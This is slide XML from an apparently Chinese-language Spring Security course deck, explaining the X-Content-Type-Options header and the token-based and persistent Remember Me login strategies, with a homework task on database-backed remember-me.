              <a:ext cx="740228" cy="740228"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="55000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="215900">
                <a:srgbClr val="7A9A92">
                  <a:alpha val="5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7932058" y="4753428"/>
              <a:ext cx="4354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7A9A92"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>5</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A9A92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xmlns="" id="{66B3810C-8E42-4CEC-8D85-1F5FF9323A0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6505585" y="4238301"/>
            <a:ext cx="4844205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 err="1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WebSocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0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2800" dirty="0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安全整合</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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15304956"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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5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4" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="4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53143" y="551543"/>
            <a:ext cx="4238172" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4238172" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373258" y="1124504"/>
              <a:ext cx="3149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Web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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安全策略</a:t>
              </a:r>
              <a:endPara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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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2</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="6D180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&lt;session-management&gt;</a:t>
            </a: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53143" y="551543"/>
            <a:ext cx="4238172" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4238172" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373258" y="1124504"/>
              <a:ext cx="3149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Web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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安全策略</a:t>
              </a:r>
              <a:endPara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6284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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2</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="218547" y="1205391"/>
            <a:ext cx="5210628" cy="3954929"/>
            <a:chOff x="7478783" y="1890258"/>
            <a:chExt cx="5210628" cy="3954929"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54983" y="1890258"/>
              <a:ext cx="5134428" cy="568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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>X-Content-Type-Options </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>安全 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Header</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478783" y="2551978"/>
              <a:ext cx="4934024" cy="32932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/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>X-Content-Type-Options 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响应首部相当于一个提示标志，被服务器用来提示客户端一定要遵循在 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Content-Type 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首部中对  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MIME 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类型 的设定，而不能对其进行修改。这就禁用了客户端的 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MIME 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类型嗅探行为，换句话说，也就是意味着网站管理员确定自己的设置没有问题。</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p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这个消息首部最初是由微软在 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IE 8 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浏览器中引入的，提供给网站管理员用作禁用内容嗅探的手段，内容嗅探技术可能会把不可执行的 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MIME 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类型转变为可执行的 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MIME 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类型。在此之后，其他浏览器也相继引入了这个首部，尽管它们的 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MIME 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嗅探算法没有那么有侵略性。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AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5152571" y="1223248"/>
            <a:ext cx="6900562" cy="1492717"/>
            <a:chOff x="7478782" y="1890258"/>
            <a:chExt cx="4985657" cy="1492717"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54984" y="1890258"/>
              <a:ext cx="4540536" cy="568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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>X-Content-Type-Options </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>设置</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478782" y="2551978"/>
              <a:ext cx="498565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/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Spring Security 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默认是开启设置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</a:rPr>
                <a:t>X-Content-Type-Options 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响应头的，也可自定义（比如关闭），如下：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea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708" y="2485762"/>
            <a:ext cx="5457143" cy="2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197430"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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椭圆 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2931886" y="2786743"/>
            <a:ext cx="1567543" cy="1567543"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="56F2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902857" y="3207657"/>
            <a:ext cx="15530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目录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5936343" y="3207657"/>
            <a:ext cx="740228" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="740228" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="椭圆 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="45C1A4">
                <a:alpha val="55000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="215900">
                <a:srgbClr val="7A9A92">
                  <a:alpha val="5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6444343" y="1132114"/>
              <a:ext cx="4354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>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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44192AA8-6EE0-4E55-8A69-BE83B2761E8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6831195" y="3151643"/>
            <a:ext cx="3156028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Remember Me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特性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8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CC1F883B-4400-4D47-A931-29527A2AD0CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6831195" y="3684710"/>
            <a:ext cx="4681656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作业</a:t>
            </a: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4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：分析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Spring Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16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RememberMe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的特性，实现基于数据库的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16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Rememberme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方式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1924897976"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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758 0.00046 L 0.04453 2.22222E-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9" y="-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1784 0.00092 L -2.08333E-7 2.22222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" y="-4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758 0.00046 L 0.04453 2.22222E-6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9" y="-2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1784 0.00092 L -2.08333E-7 2.22222E-6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" y="-4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758 0.00046 L 0.04453 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="75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9" y="-2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1784 0.00092 L -2.08333E-7 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="25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9" grpId="2"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="10" grpId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53143" y="551543"/>
            <a:ext cx="4513942" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4513942" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373257" y="1124504"/>
              <a:ext cx="34253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Remember Me</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="280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特性</a:t>
              </a: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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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3</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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xmlns="" id="{AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="218546" y="1136065"/>
            <a:ext cx="11343934" cy="2138022"/>
            <a:chOff x="7478783" y="1798330"/>
            <a:chExt cx="5155402" cy="2835018"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="83" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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9757" y="1798330"/>
              <a:ext cx="5134428" cy="568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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Remember Me</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478783" y="2551978"/>
              <a:ext cx="4934024" cy="20813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该特性允许用户在登录网站时选择记住身份即使浏览器关闭了。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</a:rPr>
                <a:t>Spring Security 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是通过将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</a:rPr>
                <a:t>remember-me cookie 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存储在浏览器中。如果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Spring Security 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识别出了用户已有的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</a:rPr>
                <a:t>remember-me cookie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，用户将自动登录网站，而无需输入账号和密码。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</a:rPr>
                <a:t>Spring  Security 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提供了两种不同的策略，如下：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>1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、基于令牌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</a:rPr>
                <a:t>(Token-based)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的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Rember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</a:rPr>
                <a:t> Me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特性</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2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、基于持有化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(Persistent-based)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的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Rember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 Me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特性</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr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xmlns="" id="{AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="174956" y="3149292"/>
            <a:ext cx="5097598" cy="3954929"/>
            <a:chOff x="7478782" y="1890258"/>
            <a:chExt cx="5294754" cy="3954929"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="93" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54985" y="1890258"/>
              <a:ext cx="4540536" cy="568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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>基于</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>令牌</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>(Token-based)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478782" y="2551978"/>
              <a:ext cx="5294754" cy="32932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这种方式将设置设置一个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</a:rPr>
                <a:t>cookie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值在用户额浏览器中包含基于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</a:rPr>
                <a:t>Base64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编码的字符串，字符串有如下部分组成：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>1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、用户名</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2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、过期时间</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>3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、将用户名、过期时间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、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密码和指定的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</a:rPr>
                <a:t>KEY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进行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</a:rPr>
                <a:t>MD5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加密</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p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如图：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Spring Security 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获取该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</a:rPr>
                <a:t>cookie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中的签名会进行校验，校验成功则完成自动登录。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea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21" y="5348846"/>
            <a:ext cx="4754563" cy="542857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="96" name="组合 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5167085" y="3215722"/>
            <a:ext cx="6900562" cy="2231380"/>
            <a:chOff x="7478782" y="1890258"/>
            <a:chExt cx="4985657" cy="2231380"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="97" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54985" y="1890258"/>
              <a:ext cx="4540536" cy="568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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
